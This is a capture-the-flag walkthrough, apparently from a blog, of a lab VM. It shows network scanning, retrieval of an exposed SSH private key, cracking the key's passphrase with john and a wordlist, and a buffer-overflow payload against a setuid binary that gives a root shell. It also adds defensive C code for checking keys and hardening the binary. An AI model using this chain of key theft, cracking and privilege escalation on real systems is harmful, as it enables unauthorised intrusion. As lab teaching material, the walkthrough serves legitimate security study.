CTF training SSH service (1)

**First, find the target machine's address**

Before probing, make sure the attacking machine's network connection mode is bridged mode; that is why bridged mode was chosen for the virtual machine's network, since it puts the attacker and the target on the same LAN.

root@kali:~# netdiscover -r 192.168.1.1/24

Explanation:

  1. Netdiscover is an active/passive ARP reconnaissance tool. It is especially useful on wireless networks that do not use DHCP. Netdiscover scans the IP addresses on the network, either by sending ARP requests or by listening for ARP replies, to check which hosts are online; it is used for host discovery on a LAN.
  2. DHCP (Dynamic Host Configuration Protocol) is commonly used in large local area network environments. Its main role is centralized management and assignment of IP addresses: a host in a dynamic network environment obtains its IP address, gateway address, DNS server address and other settings from it, which also improves address utilization.
     DHCP uses a client/server model, and the task of dynamically assigning host addresses is driven by the network host. When the DHCP server receives an address request from a host, it sends the address and the related configuration information back to that host, achieving dynamic allocation of host address information.

**Second, test connectivity to the target host**

root@kali:~# ping  

The ping output above proves that the two machines can reach each other, so we can carry on with the experiment.
**Third, port scan**


root@kali:~# nmap -sV 192.168.1.107
Scan result:
Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2019-07-04 21:37 CST
Nmap scan report for 192.168.1.107
Host is up (0.00013s latency).
Not shown: 997 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.4p1 Debian 10 (protocol 2.0)
80/tcp    open  http    nginx 1.10.3
31337/tcp open  http    Werkzeug httpd 0.11.15 (Python 3.5.3)
MAC Address: 08:00:27:50:7F:AC (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.79 seconds

**Fourth, analyze the scan results**

http://192.168.1.107:31337/

Viewing the page source of the site on port 31337 gives no useful information.

**Fifth, detect hidden files**

root@kali:~# dirb http://192.168.1.107:31337/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Fri Jul  5 17:25:10 2019
URL_BASE: http://192.168.1.107:31337/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.1.107:31337/ ----
+ http://192.168.1.107:31337/.bash_history (CODE:200|SIZE:19)                                                                                       
+ http://192.168.1.107:31337/.bashrc (CODE:200|SIZE:3526)                                                                                           
+ http://192.168.1.107:31337/.profile (CODE:200|SIZE:675)                                                                                           
+ http://192.168.1.107:31337/.ssh (CODE:200|SIZE:43)                                                                                                
+ http://192.168.1.107:31337/robots.txt  (CODE:200|SIZE:70)                                                                                          
                                                                                                                                                    
-----------------
END_TIME: Fri Jul  5 17:25:24 2019
DOWNLOADED: 4612 - FOUND: 5

Five results were found.
First we open the sensitive file robots.txt (note that robots.txt is advisory only: listing a path there does not protect it, it merely advertises it):

User-agent: *
Disallow: /.bashrc
Disallow: /.profile
Disallow: /taxes

Opening the sensitive paths gives the flag value.
The .ssh directory exposes the private and public key files. We only need the private key; the public key does not have to be downloaded, because it is already present on the server (as authorized_keys).

**Sixth, log in over SSH**

root@kali:~# cd 桌面/
root@kali:~/桌面# ls -alh
总用量 16K
drwxr-xr-x  2 root root 4.0K 7月   5 17:32 .
drwxr-xr-x 29 root root 4.0K 7月   5 17:32 ..
-r--------  1 root root  395 7月   5 17:32 authorized_keys
-r--------  1 root root 1.8K 7月   5 17:31 id_rsa
root@kali:~/桌面# chmod 777 id_rsa 
root@kali:~/桌面# 
Set the permissions on the key file, then log in to the SSH service with the private key. Note that ssh refuses a private key that other users can read ("permissions are too open"); the later ls -al shows id_rsa at -rw------- (0600), which is what ssh expects.

With the private key in hand, logging in still prompts for the key's passphrase, so we also need that:

root@kali:~/桌面# ssh -i id_rsa  [email protected]
The authenticity of host '192.168.1.107 (192.168.1.107)' can't be established.
ECDSA key fingerprint is SHA256:5Tmg/FD7Iga/sFY/1z4etq44S8/bmokfg3R3VyjHtVM.
Are you sure you want to continue connecting (yes/no)? y
Please type 'yes' or 'no': yes
Warning: Permanently added '192.168.1.107' (ECDSA) to the list of known hosts.
Enter passphrase for key 'id_rsa': 
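
The prompt shows that this key is passphrase-protected. As an added defender-side check, not part of the original write-up, the C program below reads an OpenSSH private key file and reports whether its contents are encrypted and, for the modern openssh-key-v1 format, how many bcrypt rounds stretch the passphrase. A key in the legacy PEM format ("-----BEGIN RSA PRIVATE KEY-----" armor) is flagged separately, because its encryption derives the cipher key from the passphrase with a single MD5 pass and so falls to a wordlist far faster than bcrypt does. The sample headers embedded in the code are constructed for the test and are not real keys; the function names are my own.

```c
/* Added example, not code from the original write-up or the CTF image: check whether an
 * OpenSSH private key is passphrase-protected and with which KDF, by parsing the header of
 * the "openssh-key-v1" format and flagging legacy PEM keys. Sample data is constructed. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

static uint32_t be32(const unsigned char *p) {
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) | ((uint32_t)p[2] << 8) | p[3];
}

/* Standard base64 decoder: skips whitespace, stops at '=' padding or at the '-' that
 * opens the END armor line. Returns the number of bytes written, or -1 on bad input. */
int b64_decode(const char *in, unsigned char *out, size_t outsz) {
    static const char tbl[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
    uint32_t acc = 0; int bits = 0; size_t n = 0;
    for (; *in && *in != '=' && *in != '-'; in++) {
        if (*in == '\n' || *in == '\r' || *in == ' ') continue;
        const char *p = strchr(tbl, *in);
        if (p == NULL) return -1;
        acc = (acc << 6) | (uint32_t)(p - tbl);
        bits += 6;
        if (bits >= 8) {
            bits -= 8;
            if (n >= outsz) return -1;
            out[n++] = (unsigned char)(acc >> bits);   /* low byte of the accumulated bits */
        }
    }
    return (int)n;
}

/* Read one SSH "string" (big-endian uint32 length + bytes) at *off into dst, NUL-terminated.
 * Returns its length, or -1 if it runs past the buffer or would not fit in dst. */
static int read_ssh_string(const unsigned char *buf, size_t len, size_t *off,
                           unsigned char *dst, size_t dstsz) {
    if (*off + 4 > len) return -1;
    uint32_t n = be32(buf + *off);
    *off += 4;
    if (n > len - *off || n >= dstsz) return -1;
    memcpy(dst, buf + *off, n);
    dst[n] = '\0';
    *off += n;
    return (int)n;
}

/* Parse the openssh-key-v1 header: magic, ciphername, kdfname, kdfoptions.
 * Returns -1 if the blob is not that format, 0 if the key is stored in cleartext
 * (cipher "none") or uses a KDF other than bcrypt, otherwise the bcrypt round count. */
int key_bcrypt_rounds(const unsigned char *raw, size_t len) {
    static const char magic[] = "openssh-key-v1";   /* stored with its NUL: 15 bytes */
    size_t off = sizeof magic;
    unsigned char cipher[32], kdf[32], opts[64];
    int optlen;
    if (len < off || memcmp(raw, magic, off) != 0) return -1;
    if (read_ssh_string(raw, len, &off, cipher, sizeof cipher) < 0) return -1;
    if (read_ssh_string(raw, len, &off, kdf, sizeof kdf) < 0) return -1;
    if ((optlen = read_ssh_string(raw, len, &off, opts, sizeof opts)) < 0) return -1;
    if (strcmp((char *)cipher, "none") == 0 || strcmp((char *)kdf, "bcrypt") != 0) return 0;
    if (optlen < 8) return 0;                  /* bcrypt kdfoptions = string salt + uint32 rounds */
    uint32_t salt_len = be32(opts);
    if (salt_len > (uint32_t)optlen - 8) return 0;
    return (int)be32(opts + 4 + salt_len);
}

/* Same decision from the armored file text. -2 flags a legacy PEM key (any other
 * "PRIVATE KEY-----" armor), whose passphrase protection is a single MD5 derivation. */
int key_bcrypt_rounds_from_text(const char *text) {
    static const char begin[] = "-----BEGIN OPENSSH PRIVATE KEY-----";
    unsigned char raw[32768];
    const char *body = strstr(text, begin);
    if (body == NULL) return strstr(text, "PRIVATE KEY-----") ? -2 : -1;
    int n = b64_decode(body + sizeof begin - 1, raw, sizeof raw);
    return n < 0 ? -1 : key_bcrypt_rounds(raw, (size_t)n);
}

/* Constructed samples (not real keys): a cleartext header in armor, and a raw bcrypt header. */
const char SAMPLE_PLAIN_PEM[] =
    "-----BEGIN OPENSSH PRIVATE KEY-----\n"
    "b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAAB\n"   /* magic, "none", "none", {}, 1 key */
    "-----END OPENSSH PRIVATE KEY-----\n";
const unsigned char SAMPLE_BCRYPT[] =
    "openssh-key-v1\0" "\0\0\0\x0a" "aes256-ctr" "\0\0\0\x06" "bcrypt"
    "\0\0\0\x18" "\0\0\0\x10" "0123456789abcdef" "\0\0\0\x10" "\0\0\0\x01";   /* 16-byte salt, 16 rounds */

int main(int argc, char **argv) {
    static char text[65536];
    if (argc != 2) { fprintf(stderr, "usage: %s <private key file>\n", argv[0]); return 2; }
    FILE *f = fopen(argv[1], "r");
    if (f == NULL) { perror("fopen"); return 2; }
    size_t n = fread(text, 1, sizeof text - 1, f);
    fclose(f);
    text[n] = '\0';
    int r = key_bcrypt_rounds_from_text(text);
    if (r > 0)        printf("passphrase-protected with bcrypt, %d rounds\n", r);
    else if (r == 0)  printf("NOT protected: key is stored in cleartext\n");
    else if (r == -2) printf("legacy PEM key: rewrite it with 'ssh-keygen -p' (add -o on old releases) to get the bcrypt KDF\n");
    else              printf("unrecognised key format\n");
    return r > 0 ? 0 : 1;
}
```

Build with `cc -o keycheck keycheck.c` and run `./keycheck id_rsa`. A cleartext key or a legacy PEM key is what makes an offline wordlist guess cheap; `ssh-keygen -p` rewrites a key with a (new) passphrase, and `ssh-keygen -a <rounds>` raises the bcrypt work factor above the default of 16.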

Crack the SSH private key's passphrase:

root@kali:~/桌面# ssh2john id_rsa  >tsacrack   // convert the key into a form john recognizes.
root@kali:~/桌面# ls -al
总用量 20
drwxr-xr-x  2 root root 4096 7月   5 17:44 .
drwxr-xr-x 29 root root 4096 7月   5 17:32 ..
-r--------  1 root root  395 7月   5 17:32 authorized_keys
-rw-------  1 root root 1766 7月   5 17:31 id_rsa
-rw-r--r--  1 root root 3553 7月   5 17:46 tsacrack         // conversion done
root@kali:~/桌面# zcat /usr/share/wordlists/rockyou.txt.gz | john --pipe --rules tsacrack  // crack the passphrase
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA 32/64])
Press Ctrl-C to abort, or send SIGUSR1 to john process for status
starwars         (id_rsa )  // cracked passphrase
1g 0:00:00:00  9.090g/s 6081p/s 6081c/s 6081C/s starwars
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@kali:~/桌面# ssh -i id_rsa  [email protected]  // log in over ssh
Enter passphrase for key 'id_rsa': 
Linux covfefe 4.9.0-3-686 #1 SMP Debian 4.9.30-2+deb9u2 (2017-06-26) i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
simon@covfefe:~$ 
simon@covfefe:~$ pwd   // pwd (Print Working Directory) prints the full path of the current working directory; use it when unsure where you are.
/home/simon
simon@covfefe:~$ ls
http_server.py  robots.txt
simon@covfefe:~$ cd /root  // /root is the root user's home directory; its files cannot be read by other users without root privileges
simon@covfefe:/root$ ls
flag.txt  read_message.c
simon@covfefe:/root$ cat flag.txt
cat: flag.txt: Permission denied
simon@covfefe:/root$ find / -perm -4000 2>/dev/null  // find setuid files, which execute with their owner's (here root's) privileges
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/local/bin/read_message    // this binary matches read_message.c under /root; let's look at it.
/bin/umount
/bin/su
/bin/mount
/bin/ping
simon@covfefe:/root$ cat read_message.c 
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

// You're getting close! Here's another flag:
// flag2{use_the_source_luke}

int main(int argc, char *argv[]) {
    char program[] = "/usr/local/sbin/message";
    char buf[20];        // 20-byte buffer: the overflow happens here.
    char authorized[] = "Simon";

    printf("What is your name?\n");
    gets(buf);

    // Only compare first five chars to save precious cycles:
    if (!strncmp(authorized, buf, 5)) {
        printf("Hello %s! Here is your message:\n\n", buf);
        // This is safe as the user can't mess with the binary location:
        execve(program, NULL, NULL);
    } else {
        printf("Sorry %s, you're not %s! The Internet Police have been informed of this violation.\n", buf, authorized);
        exit(EXIT_FAILURE);
    }

}
simon@covfefe:/root$ read_message
What is your name?
simonAAAAAAAAAAAAAAA/bin/sh
Sorry simonAAAAAAAAAAAAAAA/bin/sh, you're not Simon! The Internet Police have been informed of this violation.
simon@covfefe:/root$ read_message
What is your name?
SimonAAAAAAAAAAAAAAA/bin/sh
Hello SimonAAAAAAAAAAAAAAA/bin/sh! Here is your message:

# pwd             // now in the /root directory.
/root
# cat flag.txt
You did it! Congratulations, here's the final flag:
flag3{das_bof_meister}
# 
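
The source above shows why the long name works: gets() has no bound, so input past buf[20] runs into the neighbouring program[] array, and strncmp compares only five characters. Below is an added hardened version (my example, not the CTF image's read_message.c). It keeps the page's authorized name and the helper path /usr/local/sbin/message, bounds the read with fgets, rejects over-long names instead of truncating them, compares the whole string, and passes an explicit argv and an empty environment to execve. check_name and classify_line are names chosen for this example.

```c
/* Added example, not the CTF image's own code: a hardened rewrite of read_message.c.
 * The page's version reads with gets() into buf[20], so a long name overwrites the
 * neighbouring program[] path, and strncmp(..., 5) accepts any name starting "Simon".
 * check_name/classify_line are names chosen for this example. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define NAME_BUF 20                       /* same buffer size the original used */
static const char AUTHORIZED[] = "Simon";
static const char MESSAGE_PROGRAM[] = "/usr/local/sbin/message";   /* helper path from the page */

enum name_result { NAME_TOO_LONG = -1, NAME_DENIED = 0, NAME_AUTHORIZED = 1 };

/* Copy one input line (trailing '\n' optional) into name_out. Anything that would not
 * fit is rejected outright rather than silently truncated; then the whole name is compared. */
enum name_result check_name(const char *line, char *name_out, size_t outsz) {
    size_t len = strcspn(line, "\n");
    if (len >= outsz) return NAME_TOO_LONG;   /* would overflow: refuse */
    memcpy(name_out, line, len);
    name_out[len] = '\0';
    return strcmp(name_out, AUTHORIZED) == 0 ? NAME_AUTHORIZED : NAME_DENIED;
}

/* Same decision with a scratch buffer of the original size; handy for testing. */
enum name_result classify_line(const char *line) {
    char name[NAME_BUF];
    return check_name(line, name, sizeof name);
}

int main(void) {
    char line[256], name[NAME_BUF];
    printf("What is your name?\n");
    if (fgets(line, sizeof line, stdin) == NULL) return EXIT_FAILURE;   /* bounded read */
    switch (check_name(line, name, sizeof name)) {
    case NAME_AUTHORIZED: {
        char *const argv[] = { "message", NULL };
        char *const envp[] = { NULL };    /* a setuid helper gets no inherited environment */
        printf("Hello %s! Here is your message:\n\n", name);
        fflush(stdout);
        execve(MESSAGE_PROGRAM, argv, envp);
        perror("execve");                 /* only reached if the exec failed */
        return EXIT_FAILURE;
    }
    case NAME_TOO_LONG:
        fprintf(stderr, "Name too long (max %d characters).\n", NAME_BUF - 1);
        return EXIT_FAILURE;
    default:
        printf("Sorry %s, you're not %s!\n", name, AUTHORIZED);
        return EXIT_FAILURE;
    }
}
```

Even the hardened version still runs a program as root if the binary keeps its setuid bit, so the remaining trust boundary is the message helper itself; compiling with `-fstack-protector-strong -D_FORTIFY_SOURCE=2` adds a second line of defence should another bounded-copy mistake creep in.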

Summary:

netdiscover -r 192.168.1.1/24   // scan for live hosts on the LAN
ping 192.168.1.107   // test connectivity
dirb http://192.168.1.107:31337/   // look for hidden directories and files
ssh -i <private key> <username>@<ip address>   // log in over ssh
ssh2john <private key file> > tsacrack   // convert the private key file into a form john recognizes.
zcat /usr/share/wordlists/rockyou.txt.gz | john --pipe --rules tsacrack   // crack the passphrase
The first file is the wordlist that ships with Kali.
pwd   // show the current path
find / -perm -4000 2>/dev/null

or

find /home -user root -ls

The 2>/dev/null idiom on Linux

It discards standard error, for example:

[root@zhoucentos log]# rm filename1 
rm: 无法删除"filename1": 没有那个文件或目录
[root@zhoucentos log]# rm filename1 2>/dev/null

Explanation of find / -perm -4000 2>/dev/null: search the whole filesystem for files whose setuid bit (mode 4000) is set, and throw away the "Permission denied" errors that find prints for directories the current user cannot read, so only the matching paths remain.

Origin blog.csdn.net/weixin_43803070/article/details/94655508